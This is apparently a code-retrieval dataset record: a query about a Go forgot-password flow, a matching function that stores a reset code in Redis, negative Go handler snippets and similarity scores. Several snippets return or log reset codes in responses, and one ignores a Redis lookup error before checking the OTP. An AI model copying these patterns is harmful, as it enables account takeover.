{\n\t\treturn e\n\t}\n\treturn nil\n}", "func (c *AdminSessionClient) Delete() *AdminSessionDelete {\n\tmutation := newAdminSessionMutation(c.config, OpDelete)\n\treturn &AdminSessionDelete{config: c.config, hooks: c.Hooks(), mutation: mutation}\n}", "func (m *Repository) AdminDashboard(w http.ResponseWriter, r *http.Request) {\n\trender.Template(w, r, \"admin-dashboard.page.tmpl\", &models.TemplateData{})\n}", "func (c *DomainController) Admin(addr sdk.AccAddress) *DomainController {\n\tc.validators = append(c.validators, func(controller *DomainController) error {\n\t\treturn controller.isAdmin(addr)\n\t})\n\treturn c\n}", "func IsAdmin(next echo.HandlerFunc) echo.HandlerFunc {\n\treturn func(c echo.Context) error {\n\t\tuser := c.Get(\"user\").(*jwt.Token)\n\t\tclaims := user.Claims.(jwt.MapClaims)\n\t\tisAdmin := claims[\"admin\"].(bool)\n\t\tif isAdmin == false {\n\t\t\t//res.Response(http.StatusUnauthorized, \"Unauthorized\", nil)\n\t\t\treturn echo.ErrUnauthorized\n\t\t}\n\t\t//res.Response(http.StatusOK, \"\", nil)\n\t\treturn next(c)\n\t}\n}" ]
[ "0.76786566", "0.7470642", "0.7054028", "0.69997346", "0.69702077", "0.67570275", "0.67210203", "0.6699456", "0.66597235", "0.655705", "0.6519527", "0.64041364", "0.6399189", "0.6351331", "0.6346993", "0.6275566", "0.6214313", "0.6211368", "0.6193503", "0.6181546", "0.61792684", "0.61420035", "0.6135563", "0.6123491", "0.60959876", "0.6083864", "0.6031874", "0.5955241", "0.58611184", "0.58132", "0.5794962", "0.57914275", "0.5785773", "0.5785328", "0.5779789", "0.577856", "0.57596874", "0.5752964", "0.5735322", "0.5720125", "0.5717809", "0.5676141", "0.5664141", "0.5635526", "0.5613388", "0.55898535", "0.558861", "0.5557376", "0.55088735", "0.5471541", "0.5471541", "0.5469707", "0.5467332", "0.54672945", "0.5459595", "0.5446509", "0.54301846", "0.5427652", "0.5423086", "0.5405634", "0.53992593", "0.5396907", "0.538541", "0.5382572", "0.5365909", "0.5352232", "0.5324846", "0.53195286", "0.5317559", "0.5316493", "0.5315707", "0.5310552", "0.52980477", "0.52909905", "0.5281339", "0.527467", "0.5268582", "0.5268416", "0.52568483", "0.5248843", "0.5248843", "0.5234551", "0.52253175", "0.522152", "0.52157724", "0.5214356", "0.5207309", "0.5202329", "0.52013475", "0.5200911", "0.52006686", "0.51885307", "0.5185066", "0.5184628", "0.5180728", "0.51729536", "0.5172253", "0.51684463", "0.516771", "0.51645535" ]
0.6911579
5
Forgot Password Fucntionality 1. Request with Email 2. Send Code And save code in redis 3. Compare code And send response 4. Enter new password and remove from redis ForgotPasswordRequest is to start the process
func (orm *ORM) ForgotPasswordRequest(ctx context.Context, email string) (*models.Admin, error) { var _Admin models.Admin // check if admin exists err := orm.DB.DB.First(&_Admin, "email = ?", email).Error if errors.Is(err, gorm.ErrRecordNotFound) { return nil, errors.New("AdminNotFound") } //generate code code := generatecode.GenerateCode(6) //save in redis and expire in an hours time redisErr := orm.rdb.Set(ctx, fmt.Sprintf("%s", _Admin.ID), code, 1*time.Hour).Err() if redisErr != nil { return nil, redisErr } // send code to email mailErr := mail.SendMail(_Admin.Email, fmt.Sprintf("Your code is %s", code)) if mailErr != nil { return nil, mailErr } return &_Admin, nil }
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "func resetPasswordRequest(w http.ResponseWriter, r *http.Request) {\n\tw.Header().Set(\"Content-Type\", \"application/json\")\n\tvar body otpRequest\n\n\terr := json.NewDecoder(r.Body).Decode(&body)\n\tlog.ErrorHandler(err)\n\n\t// Verify email\n\temailStatus := emailValidator(body.Email)\n\tif !emailStatus {\n\t\tw.WriteHeader(http.StatusBadRequest)\n\t\terr = json.NewEncoder(w).Encode(core.FourHundred)\n\t\tlog.ErrorHandler(err)\n\t\tlog.AccessHandler(r, 400)\n\t\treturn\n\t}\n\n\tvar count int64\n\tvar user User\n\tdb.Find(&user, \"email = ?\", body.Email).Count(&count)\n\n\tif count <= 0 {\n\t\tw.WriteHeader(http.StatusUnauthorized)\n\t\terr = json.NewEncoder(w).Encode(core.FourOOne)\n\t\tlog.ErrorHandler(err)\n\t\tlog.AccessHandler(r, 401)\n\t\treturn\n\t}\n\n\t// generate token\n\tvar data otp\n\tdata = otp{\n\t\tEmail: body.Email,\n\t\tPin: generateOTP(),\n\t}\n\n\t// save token to redis\n\terr = redisClient.Set(ctx, \"password_reset_\"+data.Email, data.Pin, 30*time.Minute).Err()\n\tif err != nil {\n\t\tlog.ErrorHandler(err)\n\t\tw.WriteHeader(http.StatusInternalServerError)\n\t\terr := json.NewEncoder(w).Encode(core.FiveHundred)\n\t\tlog.ErrorHandler(err)\n\t\tlog.AccessHandler(r, 500)\n\t\treturn\n\t}\n\n\t// Send token to email\n\tpayload := struct {\n\t\tToken string\n\t}{\n\t\tToken: data.Pin,\n\t}\n\n\tstatus, err := core.SendEmailNoAttachment(data.Email, \"Reset Password\", payload, \"password_reset.txt\")\n\tif !status {\n\t\tlog.ErrorHandler(err)\n\t\tw.WriteHeader(http.StatusInternalServerError)\n\t\terr = json.NewEncoder(w).Encode(core.FiveHundred)\n\t\tlog.ErrorHandler(err)\n\t\tlog.AccessHandler(r, 500)\n\t\treturn\n\t}\n\n\t// respond okay\n\tw.WriteHeader(http.StatusOK)\n\terr = json.NewEncoder(w).Encode(core.TwoHundred)\n\tlog.ErrorHandler(err)\n\tlog.AccessHandler(r, 200)\n\treturn\n}", "func ForgetPassword(w http.ResponseWriter, req *http.Request) {\n\t//log\n\tnow, userIP := globalPkg.GetIP(req)\n\tlogobj := logpkg.LogStruct{\"_\", now, userIP, \"macAdress\", \"ForgetPassword\", \"AccountModule\", \"_\", \"_\", \"_\", 0}\n\n\tRandomCode := encodeToString(globalPkg.GlobalObj.MaxConfirmcode)\n\tcurrent := globalPkg.UTCtime()\n\tConfirmationCode := RandomCode\n\tcontact := ResetPasswordData{}\n\tdecoder := json.NewDecoder(req.Body)\n\tdecoder.DisallowUnknownFields()\n\terr := decoder.Decode(&contact)\n\tif err != nil {\n\t\tresponseObj := responses.FindResponseByID(\"1\")\n\t\tglobalPkg.SendError(w, responseObj.EngResponse)\n\t\tglobalPkg.WriteLog(logobj, \"please enter your correct request\", \"failed\")\n\t\treturn\n\t}\n\t// ForgetPassword email is lowercase and trim\n\tcontact.Email = convertStringTolowerCaseAndtrimspace(contact.Email)\n\tRP := ResetPasswordData{}\n\tRP.Code = ConfirmationCode\n\tRP.CurrentTime = current\n\taccountObjbyEmail := getAccountByEmail(contact.Email)\n\taccountObjByPhone := getAccountByPhone(contact.Phonnum)\n\tforgetObj := ForgetPasswordReturn{}\n\tif accountObjbyEmail.AccountPublicKey != \"\" && contact.Email != \"\" {\n\n\t\tRP.Email = contact.Email\n\t\tRP.PathAPI = globalPkg.RandomPath()\n\t\tbroadcastTcp.BoardcastingTCP(RP, \"addRestPassword\", \"account module\")\n\t\t//addResetpassObjInTemp(RP)\n\t\t//body email for forget password\n\t\tbody := \"Dear \" + accountObjbyEmail.AccountName + `,\n\t\tYou recently requested to reset your password for your Inovation Corporation account.\n\t\tYour confirmation code is: ` + RP.Code + `.\n\t\tif you did not request a password reset, please ignore this email or reply to let us know.\n\t\t\n\t\tRegards,\n\t\tInovatian Team`\n\n\t\tsendEmail(body, contact.Email)\n\t\tforgetObj.Code = RP.Code\n\t\tforgetObj.PathAPI = RP.PathAPI\n\t\tjsonObj, _ := json.Marshal(forgetObj)\n\t\tglobalPkg.SendResponse(w, jsonObj)\n\t\t//globalPkg.SendResponseMessage(w, Confirmation_code)\n\t\tglobalPkg.WriteLog(logobj, \"success send confirmation code\"+RP.Code, \"success\")\n\t\treturn\n\t}\n\n\tif accountObjByPhone.AccountPublicKey != \"\" && contact.Phonnum != \"\" {\n\n\t\tRP.Phonnum = contact.Phonnum\n\t\tRP.PathAPI = globalPkg.RandomPath()\n\t\tbroadcastTcp.BoardcastingTCP(RP, \"addRestPassword\", \"account module\")\n\t\t//addResetpassObjInTemp(RP)\n\t\tsendSMS(contact.Phonnum, RP.Code)\n\t\tforgetObj.Code = RP.Code\n\t\tforgetObj.PathAPI = RP.PathAPI\n\n\t\tjsonObj, _ := json.Marshal(forgetObj)\n\t\tglobalPkg.SendResponse(w, jsonObj)\n\t\tglobalPkg.WriteLog(logobj, \"success send confirmation code\"+RP.Code, \"success\")\n\t\treturn\n\t}\n\tresponseObj := responses.FindResponseByID(\"11\")\n\tglobalPkg.SendError(w, responseObj.EngResponse)\n\tglobalPkg.WriteLog(logobj, \"invalid Email Or Phone\"+RP.Code, \"failed\")\n\n}", "func (au *AuthHandler) RequestResetPasswordCode(w http.ResponseWriter, r *http.Request){\n\tw.Header().Add(\"content-type\", \"application/json\")\n\temail := struct {Email\tstring\t`json:\"email\" validate:\"email,required\"`}{}\n\n\tif err := utils.ParseJsonFromRequest(r, &email); err != nil {\n\t\tutils.GetError(err, http.StatusUnprocessableEntity, w)\n\t\treturn\n\t}\n\n\tif err := validate.Struct(email); err != nil {\n\t\tutils.GetError(err, http.StatusBadRequest, w)\n\t\treturn\n\t}\n\n\tuser, err := FetchUserByEmail(bson.M{\"email\": strings.ToLower(email.Email)})\n\tif err != nil {\n\t\tutils.GetError(UserNotFound, http.StatusBadRequest, w)\n\t\treturn\n\t}\n\n\t// check if user already requested for password\n\tif user.PasswordResets != nil {\n\t\tx2x := map[string]interface{}{ \"password_reset_code\" : user.PasswordResets.Token }\n\t\tutils.GetSuccess(\"Password reset code already sent, check your email\", x2x, w)\n\t\treturn\n\t}\n\n\t// Update user collection with UserPasswordReset - WIP\n\t_, token := utils.RandomGen(6, \"d\")\n\n\tuserPasswordReset := map[string]interface{}{\n\t\t\"ip_address\": strings.Split(r.RemoteAddr, \":\")[0],\n\t\t\"token\": token,\n\t\t\"expired_at\": time.Now(),\n\t\t\"updated_at\": time.Now(),\n\t\t\"created_at\": time.Now(),\n\t}\n\n\tid, _ := primitive.ObjectIDFromHex(user.ID)\n\tfilter := bson.M{\"_id\": id}\n\tupdate := bson.M{\"$set\": bson.M{\"password_resets\": userPasswordReset }}\n\n\t// update db;\n\tif _, err := utils.GetCollection(user_collection).UpdateOne(context.Background(), filter, update); err != nil {\n\t\tutils.GetError(err, http.StatusInternalServerError, w)\n\t\treturn\t\t\n\t}\n\n\tmsger := au.mailService.NewMail(\n\t\t[]string{user.Email}, \n\t\t\"Reset Password Code\", service.PasswordReset, \n\t\t&service.MailData{ \n\t\t\tUsername: user.Email, \n\t\t\tCode: userPasswordReset[\"token\"].(string),\n\t\t})\n\n\tif err := au.mailService.SendMail(msger); err != nil {\n\t\tfmt.Printf(\"Error occured while sending mail: %s\", err.Error())\n\t}\n\n\tutils.GetSuccess(\"Password reset code sent\", nil, w)\n}", "func ForgotPassword(w http.ResponseWriter, r *http.Request) {\n\tbody, err := ioutil.ReadAll(r.Body)\n\tvar fPass models.Password\n\terr = json.Unmarshal(body, &fPass)\n\tif err != nil {\n\t\tresponses.ERROR(w, http.StatusUnprocessableEntity, err)\n\t\treturn\n\t}\n\tuser := auth.EmailPassword(fPass.Email)\n\tif err != nil {\n\t\tresponses.ERROR(w, http.StatusUnprocessableEntity, err)\n\t\treturn\n\t}\n\t// VErify Email in db\n\tvar otp string\n\tif user == true {\n\t\tfmt.Println(\"user exist\")\n\t\totp, err = security.GenerateCode(\"sakldgofsagofiusahf\", time.Now())\n\t\t// otp = security.GenerateOTP()\n\t\temail.SendEmail2(fPass.Email, otp)\n\t\tif err != nil {\n\t\t\tfmt.Println(err)\n\t\t}\n\t\tfmt.Println(otp)\n\t}\n\tif user == false {\n\t\tfmt.Println(\"user dose not exist !!\")\n\t\tresponses.JSON(w, http.StatusBadRequest, nil)\n\t}\n\t// Generate OTP and send email'\n\n\tresponses.JSON(w, http.StatusOK, otp)\n}", "func resetPassword(w http.ResponseWriter, r *http.Request) {\n\tw.Header().Set(\"Content-Type\", \"application/json\")\n\n\t// take email, token and new password\n\tbody := struct {\n\t\tEmail string `json:\"email\"`\n\t\tOTP string `json:\"otp\"`\n\t\tPassword string `json:\"password\"`\n\t}{}\n\n\terr := json.NewDecoder(r.Body).Decode(&body)\n\tlog.ErrorHandler(err)\n\n\t// check email for existence\n\tvar user User\n\terr = db.Find(&user, \"email = ?\", body.Email).Error\n\tif errors.Is(err, gorm.ErrRecordNotFound) {\n\t\tw.WriteHeader(http.StatusUnauthorized)\n\t\tlog.ErrorHandler(err)\n\t\terr = json.NewEncoder(w).Encode(core.FourOOne)\n\t\tlog.ErrorHandler(err)\n\t\tlog.AccessHandler(r, 401)\n\t\treturn\n\t}\n\n\t// check if token exists\n\tstoredOtp, err := redisClient.Get(ctx, \"password_reset_\"+body.Email).Result()\n\tlog.ErrorHandler(err)\n\n\tif storedOtp != body.OTP {\n\t\tw.WriteHeader(http.StatusUnauthorized)\n\t\terr = json.NewEncoder(w).Encode(core.FourOOne)\n\t\tlog.ErrorHandler(err)\n\t\tlog.AccessHandler(r, 401)\n\t\treturn\n\t}\n\n\t// validate password\n\tsafePassword := passwordValidator(body.Password)\n\tif !safePassword {\n\t\tw.WriteHeader(http.StatusUnprocessableEntity)\n\t\terr = json.NewEncoder(w).Encode(core.FourTwoTwo)\n\t\tlog.ErrorHandler(err)\n\t\tlog.AccessHandler(r, 422)\n\t\treturn\n\t}\n\n\t// Generate password hash and save\n\thashedPassword, err := generatePasswordHash(body.Password)\n\tlog.ErrorHandler(err)\n\n\tuser.Password = hashedPassword\n\tdb.Save(&user)\n\n\tw.WriteHeader(http.StatusOK)\n\terr = json.NewEncoder(w).Encode(core.TwoHundred)\n\tlog.ErrorHandler(err)\n\tlog.AccessHandler(r, 200)\n\n\t// Delete from redis\n\tredisClient.Del(ctx, \"password_reset_\"+body.Email)\n\n\treturn\n}", "func Forgot(c *fiber.Ctx) error {\n\tvar data map[string]string\n\n\terr := c.BodyParser(&data)\n\n\tif err != nil {\n\t\treturn err\n\t}\n\n\ttoken := RunesRandString(12)\n\n\tpasswordReset := models.PasswordReset{\n\t\tEmail: data[\"email\"],\n\t\tToken: token,\n\t}\n\n\tdatabase.DB.Create(&passwordReset)\n\n\tvar creds credentials.AuthCreds\n\tcreds.GetCreds()\n\n\tfrom := creds.Email\n\tpassword := creds.Password\n\n\tto := []string{\n\t\tdata[\"email\"],\n\t}\n\n\turl := string(\"http://localhost:3000/reset/\" + token)\n\n\tmessage := `Subject: Password Reset for Notes App!\n\n\t\t\t\tClick on the link below to reset the password: \n\t\t\t\t<a href=\"` + url + `\"></a>\n\t\t\t\t`\n\n\tsmtpServer := models.SMTPServer{\n\t\tHost: \"smtp.gmail.com\",\n\t\tPort: \"587\",\n\t}\n\n\tauth := smtp.PlainAuth(\"\", from, password, smtpServer.Host)\n\n\terr = smtp.SendMail(smtpServer.AddressUpdate(), auth, from, to, []byte(message))\n\n\tif err != nil {\n\t\treturn c.JSON(fiber.Map{\n\t\t\t\"message\": \"Unable to reset password.\",\n\t\t})\n\t}\n\n\treturn c.JSON(fiber.Map{\n\t\t\"message\": \"An email has been sent for resetting the password. \\n Please check your spam folder if you do not see the email in your inbox!\",\n\t})\n}", "func (db *MyConfigurations) performResetPasswordByEmail(c echo.Context) error {\n\temail := c.QueryParam(\"email\")\n\thash := c.QueryParam(\"hash\")\n\turl := \"/email-reset-password?email=\" + email + \"&hash=\" + hash\n\tvar otp models.OTP\n\n\tpassword := strings.TrimSpace(c.FormValue(\"password\"))\n\tpasswordVerify := strings.TrimSpace(c.FormValue(\"passwordVerify\"))\n\n\tif len(password) == 0 {\n\t\treturn redirectWithFlashMessage(\"failure\", \"يجب تحديد كيمه السر الجديده\", url, &c)\n\t}\n\tif password != passwordVerify { // checks that the password is equal to the password verification\n\t\t// if not, redirect to /reset-password-by-email with failure flash message\n\t\treturn redirectWithFlashMessage(\"failure\", \"كلمه السر ليست متطابقه\", url, &c)\n\t}\n\n\tdb.GormDB.Table(\"otps\").First(&otp, \"email = ? AND verification_code = ?\", email, hash)\n\totp.Used = true\n\tdb.GormDB.Save(&otp)\n\tdb.GormDB.Where(\"email = ? AND user_id = ?\", email, otp.UserID).Delete(models.OTP{})\n\thashedPassword, _ := bcrypt.GenerateFromPassword([]byte(password), 10) // hash the password that the user entered\n\tdb.GormDB.Model(&models.User{}).Where(\"id = ?\", otp.UserID).Update(\"password\", string(hashedPassword))\n\n\treturn redirectWithFlashMessage(\"success\", \"تم تغيير كلمه السر\", \"/login\", &c)\n}", "func RequestResetPassword(userRepo storage.UserRepo, email string) error {\n\tuser, err := userRepo.GetUserByEmail(email)\n\tif err != nil {\n\t\treturn errors.New(\"user with email does not exist\")\n\t}\n\n\tif err := TriggerPasswordResetEmail(userRepo, user); err != nil {\n\t\treturn err\n\t}\n\n\treturn nil\n}", "func ResetPassword(w http.ResponseWriter, req *http.Request) {\n\t//log\n\tnow, userIP := globalPkg.GetIP(req)\n\n\tfound, logobj := logpkg.CheckIfLogFound(userIP)\n\n\tif found && now.Sub(logobj.Currenttime).Seconds() > globalPkg.GlobalObj.DeleteAccountTimeInseacond {\n\n\t\tlogobj.Count = 0\n\t\tbroadcastTcp.BoardcastingTCP(logobj, \"\", \"AddAndUpdateLog\")\n\n\t}\n\tif found && logobj.Count >= 10 {\n\t\tresponseObj := responses.FindResponseByID(\"6\")\n\t\tglobalPkg.SendError(w, responseObj.EngResponse)\n\t\treturn\n\t}\n\n\tif !found {\n\n\t\tLogindex := userIP.String() + \"_\" + logfunc.NewLogIndex()\n\n\t\tlogobj = logpkg.LogStruct{Logindex, now, userIP, \"macAdress\", \"ResetPassword\", \"AccountModule\", \"_\", \"_\", \"_\", 0}\n\t} else {\n\t\tlogobj = logfunc.ReplaceLog(logobj, \"ResetPassword\", \"AccountModule\")\n\t}\n\tResetPasswordDataObj := ResetPasswordData{}\n\n\t// check on path url\n\texisturl := false\n\tfor _, resetObj := range resetPassReq {\n\t\tp := \"/\" + resetObj.PathAPI\n\n\t\tif req.URL.Path == p {\n\t\t\texisturl = true\n\t\t\tbreak\n\t\t}\n\t}\n\n\tif existurl == false {\n\t\tresponseObj := responses.FindResponseByID(\"12\")\n\t\tglobalPkg.SendError(w, responseObj.EngResponse)\n\t\tlogobj.OutputData = \"this page is not found\"\n\t\tlogobj.Process = \"faild\"\n\t\tlogpkg.WriteOnlogFile(logobj)\n\t\tlogobj.Count = logobj.Count + 1\n\n\t\tbroadcastTcp.BoardcastingTCP(logobj, \"\", \"AddAndUpdateLog\")\n\t\treturn\n\t}\n\n\tData := ResetPasswordData{}\n\tdecoder := json.NewDecoder(req.Body)\n\tdecoder.DisallowUnknownFields()\n\terr := decoder.Decode(&ResetPasswordDataObj)\n\tif err != nil {\n\t\tresponseObj := responses.FindResponseByID(\"1\")\n\t\tglobalPkg.SendError(w, responseObj.EngResponse)\n\t\tglobalPkg.WriteLog(logobj, responseObj.EngResponse, \"failed\")\n\n\t\treturn\n\t}\n\tInputData := Data.Email\n\tlogobj.InputData = InputData\n\t//email is lowercase\n\tResetPasswordDataObj.Email = convertStringTolowerCaseAndtrimspace(ResetPasswordDataObj.Email)\n\tvar AccountObj accountdb.AccountStruct\n\ti, found := findInResetPassPool(ResetPasswordDataObj)\n\n\tif found == false {\n\t\tresponseObj := responses.FindResponseByID(\"104\")\n\t\tglobalPkg.SendNotFound(w, responseObj.EngResponse)\n\t\tglobalPkg.WriteLog(logobj, \"invalid data\", \"failed\")\n\t\tlogobj.OutputData = \"Invalid Data\"\n\t\tlogobj.Process = \"failed\"\n\t\tlogobj.Count = logobj.Count + 1\n\n\t\tbroadcastTcp.BoardcastingTCP(logobj, \"\", \"AddAndUpdateLog\")\n\n\t\treturn\n\n\t}\n\t//Data should be removed from list\n\tData = resetPassReq[i]\n\n\tif len(ResetPasswordDataObj.Newpassword) != 64 {\n\t\tresponseObj := responses.FindResponseByID(\"7\")\n\t\tglobalPkg.SendError(w, responseObj.EngResponse)\n\t\tglobalPkg.WriteLog(logobj, \"invalid password length \", \"failed\")\n\t\treturn\n\t}\n\tsub := now.Sub(Data.CurrentTime).Seconds()\n\tif sub > 3000 {\n\t\tresponseObj := responses.FindResponseByID(\"8\")\n\t\tglobalPkg.SendError(w, responseObj.EngResponse)\n\t\tlogobj.OutputData = \"Time out \"\n\t\tlogobj.Process = \"faild\"\n\t\tglobalPkg.WriteLog(logobj, \"time out\", \"failed\")\n\t\tlogobj.Count = logobj.Count + 1\n\t\tbroadcastTcp.BoardcastingTCP(logobj, \"\", \"AddAndUpdateLog\")\n\t\treturn\n\t}\n\tif ResetPasswordDataObj.Email != \"\" {\n\t\tAccountObj = getAccountByEmail(ResetPasswordDataObj.Email)\n\t\tAccountObj.AccountPassword = ResetPasswordDataObj.Newpassword\n\t\tAccountObj.AccountLastUpdatedTime = now\n\t\tbroadcastTcp.BoardcastingTCP(AccountObj, \"Resetpass\", \"account\")\n\t\tresponseObj := responses.FindResponseByID(\"9\")\n\t\tglobalPkg.SendResponseMessage(w, responseObj.EngResponse)\n\t\tglobalPkg.WriteLog(logobj, \"your password successfully changed\", \"success\")\n\n\t\tif logobj.Count > 0 {\n\t\t\tlogobj.OutputData = \"your password successfully changed\"\n\t\t\tlogobj.Process = \"success\"\n\t\t\tlogobj.Count = 0\n\n\t\t\tbroadcastTcp.BoardcastingTCP(logobj, \"\", \"AddAndUpdateLog\")\n\t\t}\n\t\treturn\n\t}\n\n\tif ResetPasswordDataObj.Phonnum != \"\" {\n\t\tAccountObj = getAccountByPhone(ResetPasswordDataObj.Email)\n\t\tAccountObj.AccountPassword = ResetPasswordDataObj.Newpassword\n\t\tAccountObj.AccountLastUpdatedTime = now\n\t\tbroadcastTcp.BoardcastingTCP(AccountObj, \"Resetpass\", \"account\") //\tupdateAccount(AccountObj)\n\t\tresponseObj := responses.FindResponseByID(\"9\")\n\t\tglobalPkg.SendResponseMessage(w, responseObj.EngResponse)\n\t\tglobalPkg.WriteLog(logobj, \"your password successfully changed\", \"success\")\n\t\tif logobj.Count > 0 {\n\t\t\tlogobj.OutputData = \"your password successfully changed\"\n\t\t\tlogobj.Process = \"success\"\n\t\t\tlogobj.Count = 0\n\n\t\t\tbroadcastTcp.BoardcastingTCP(logobj, \"\", \"AddAndUpdateLog\")\n\t\t}\n\t\treturn\n\t}\n\n}", "func Reset(c *fiber.Ctx) error {\n\tvar data map[string]string\n\n\terr := c.BodyParser(&data)\n\n\tif err != nil {\n\t\treturn err\n\t}\n\n\tif data[\"password\"] != data[\"password_confirm\"] {\n\t\tc.Status(400)\n\t\treturn c.JSON(fiber.Map{\n\t\t\t\"messgae\": \"Passwords do not match\",\n\t\t})\n\t}\n\n\tvar passwordReset = models.PasswordReset{}\n\n\tif err := database.DB.Where(\"token = ?\", data[\"token\"]).Last(&passwordReset); err.Error != nil {\n\t\tc.Status(400)\n\t\treturn c.JSON(fiber.Map{\n\t\t\t\"messgae\": \"Invalid Token!\",\n\t\t})\n\t}\n\n\tpassword, _ := bcrypt.GenerateFromPassword([]byte(data[\"password\"]), 14)\n\n\tdatabase.DB.Model(&models.User{}).Where(\"email = ?\", passwordReset.Email).Update(\"password\", password)\n\n\treturn c.JSON(fiber.Map{\n\t\t\"message\": \"Password reset successful\",\n\t})\n\n}", "func (self *Apn) ResetPassword(rw web.ResponseWriter, req *web.Request) {\n\tif req.Method != \"POST\" {\n\t\tFail(rw)\n\t\treturn\n\t}\n\n\tokPacket := &packet.OkPacket{}\n\n\tbody, err := ioutil.ReadAll(req.Body)\n\tif err != nil {\n\t\tlog.Error(\"read request error\", err)\n\t\tFail(rw)\n\t\treturn\n\t}\n\n\tmodifyPacket := &SignInUp{}\n\terr = json.Unmarshal(body, &modifyPacket)\n\tif err != nil {\n\t\tlog.Error(\"decode the json packet error:\", err)\n\t\tFail(rw)\n\t\treturn\n\t}\n\n\tif !modifyPacket.IsValid() {\n\t\tokPacket.Code = 0\n\t\tokPacket.Message = \"request parms is invalid\"\n\t\trw.Write(xjson.Encode(okPacket))\n\t\treturn\n\t}\n\n\tif registered := user.IsUsernameRegistered(modifyPacket.UserName); !registered {\n\t\tokPacket.Code = 0\n\t\tokPacket.Message = \"username has not registered\"\n\t\trw.Write(xjson.Encode(okPacket))\n\t\treturn\n\t}\n\n\tuser.ModifyPassword(modifyPacket.Phone, modifyPacket.Password)\n\n\tuserId := user.GetUserIdByUserName(modifyPacket.UserName)\n\tif userId == 0 {\n\t\tFail(rw)\n\t\treturn\n\t}\n\n\t//delete the session, because user change the password\n\tsession.DeleteSessionByUserId(userId)\n\n\tokPacket.Code = 1\n\tSuccess(rw)\n\trw.Write(xjson.Encode(okPacket))\n\n}", "func ResetPassword(c *fiber.Ctx) error {\n\tvar req dto.PasswordReset\n\tevpw := c.Params(\"evpw\")\n\turl_email := c.Params(\"email\")\n\n\tif err := c.BodyParser(&req); err != nil {\n\t\tgetStatus(c, 422, err)\n\t} else {\n\t\tappErr := service.ResetPassword(req, evpw, url_email)\n\t\tif appErr.Status != true {\n\t\t\tgetStatus(c, 500, appErr)\n\t\t} else {\n\t\t\tgetStatus(c, 200, appErr)\n\t\t}\n\t}\n\treturn nil\n}", "func (c *Config) ForgotPassword(w http.ResponseWriter, r *http.Request) {\n\tctx := r.Context()\n\n\tvar payload forgotPasswordPayload\n\tif err := bjson.ReadJSON(&payload, r); err != nil {\n\t\tbjson.HandleError(w, err)\n\t\treturn\n\t}\n\n\tif err := valid.Raw(&payload); err != nil {\n\t\tbjson.HandleError(w, err)\n\t\treturn\n\t}\n\n\tu, found, err := c.UserStore.GetUserByEmail(ctx, payload.Email)\n\tif err != nil {\n\t\tbjson.HandleError(w, err)\n\t\treturn\n\t} else if found {\n\t\tif err := c.Mail.SendPasswordResetEmail(u,\n\t\t\tu.GetPasswordResetMagicLink(c.Magic)); err != nil {\n\t\t\tlog.Alarm(err)\n\t\t}\n\t}\n\n\tbjson.WriteJSON(w, map[string]string{\n\t\t\"message\": \"Check your email for a link to reset your password\",\n\t}, http.StatusOK)\n}", "func (app *application) ResetPassword(w http.ResponseWriter, r *http.Request) {\n\tvar payload struct {\n\t\tEmail string `json:\"email\"`\n\t\tPassword string `json:\"password\"`\n\t}\n\n\terr := app.readJSON(w, r, &payload)\n\tif err != nil {\n\t\tapp.badRequest(w, r, err)\n\t\treturn\n\t}\n\n\t// decrypt email\n\tencryptor := encryption.Encryption {\n\t\tKey: []byte(app.config.secretkey),\n\t}\n\n\trealEmail, err := encryptor.Decrypt(payload.Email)\n\tif err != nil {\n\t\tapp.badRequest(w, r, err)\n\t\treturn\n\t}\n\n\tuser, err := app.DB.GetUserByEmail(realEmail)\n\tif err != nil {\n\t\tapp.badRequest(w, r, err)\n\t\treturn\n\t}\n\n\t// create hash using new password\n\tnewHash, err := bcrypt.GenerateFromPassword([]byte(payload.Password), 12)\n\tif err != nil {\n\t\tapp.badRequest(w, r, err)\n\t\treturn\n\t}\n\n\terr = app.DB.UpdatePasswordForUser(user, string(newHash))\n\tif err != nil {\n\t\tapp.badRequest(w, r, err)\n\t\treturn\n\t}\n\n\tvar resp struct {\n\t\tError bool `json:\"error\"`\n\t\tMessage string \t`json:\"message\"`\n\t}\n\tresp.Error = false\n\tresp.Message = \"password changed\"\n\n\tapp.writeJSON(w, http.StatusCreated, resp)\n}", "func requestResetPassword(email string) api.Response {\n\tvar resetLink, err = auth.RequestResetPassword(email)\n\tif err != nil {\n\t\treturn api.InternalServerError(err)\n\t}\n\n\treturn api.PlainTextResponse(http.StatusOK, resetLink)\n}", "func (h *AuthHandlers) Forgot(w http.ResponseWriter, req *http.Request) {\n\tvar err error\n\tvar data []byte\n\n\tsystemContext, err := h.getSystemContext(req)\n\tif err != nil {\n\t\tlog.Error().Err(err).Msg(\"request context retrevial failure\")\n\t\tmiddleware.ReturnError(w, err.Error(), 500)\n\t\treturn\n\t}\n\n\tif data, err = ioutil.ReadAll(req.Body); err != nil {\n\t\tlog.Error().Err(err).Msg(\"read body error\")\n\t\tmiddleware.ReturnError(w, \"error reading refresh data\", 500)\n\t\treturn\n\t}\n\tdefer req.Body.Close()\n\n\tforgotDetails := &authz.ResetDetails{}\n\tif err := json.Unmarshal(data, forgotDetails); err != nil {\n\t\tlog.Error().Err(err).Msg(\"marshal body error\")\n\t\tmiddleware.ReturnError(w, \"error reading forgot password data\", 500)\n\t\treturn\n\t}\n\n\tif err := h.validate.Struct(forgotDetails); err != nil {\n\t\tmiddleware.ReturnError(w, \"validation failure \"+err.Error(), 500)\n\t\treturn\n\t}\n\n\tforgotDetails.OrgName = strings.ToLower(forgotDetails.OrgName)\n\tforgotDetails.Username = strings.ToLower(forgotDetails.Username)\n\n\tlog.Info().Str(\"user\", forgotDetails.Username).Str(\"org\", forgotDetails.OrgName).Msg(\"failed to get organization from name\")\n\torgData, err := h.getOrgByName(req.Context(), systemContext, forgotDetails.OrgName)\n\tif err != nil {\n\t\tlog.Error().Err(err).Msg(\"failed to get organization from name\")\n\t\tmiddleware.ReturnError(w, \"forgot password failed\", 403)\n\t\treturn\n\t}\n\n\tlog.Info().Msg(\"calling authenticator.Forgot\")\n\tif err := h.authenticator.Forgot(req.Context(), orgData, forgotDetails); err != nil {\n\t\tlog.Error().Err(err).Msg(\"forgot password failed\")\n\t\tmiddleware.ReturnError(w, \"forgot password failed\", 403)\n\t\treturn\n\t}\n\n\tresp := make(map[string]string, 0)\n\tresp[\"status\"] = \"ok\"\n\n\trespData, _ := json.Marshal(resp)\n\tw.WriteHeader(200)\n\tfmt.Fprint(w, string(respData))\n}", "func (ah *AuthHandler) ResetPassword(w http.ResponseWriter, r *http.Request) {\n\n\tw.Header().Set(\"Content-Type\", 